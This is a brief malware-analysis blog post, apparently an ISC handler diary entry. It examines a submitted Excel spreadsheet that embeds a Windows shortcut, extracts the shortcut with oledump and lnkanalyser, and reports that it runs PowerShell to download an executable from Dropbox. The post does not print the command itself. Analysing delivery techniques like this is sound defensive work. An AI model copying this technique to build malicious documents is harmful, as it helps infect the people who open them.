Reader nik submitted a malicious document. It's an Excel spreadsheet containing a Windows shortcut. As Windows shortcuts can contain interesting metadata like the MAC address of the computer that created the .lnk file, I took a closer look. First we take a look with oledump: The 0 next to stream A2 indicates the spreadsheet contains an embedded OLE2 object. We can get more info: It's a Windows shortcut file (created by Windows user Tiny). We will extract it for further analysis: And then we can use Woanware's lnkanalyser: Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox. Didier Stevens |
DidierStevens 640 Posts ISC Handler Jul 15th 2017 |
Thread locked Subscribe |
Jul 15th 2017 4 years ago |
Sign Up for Free or Log In to start participating in the conversation!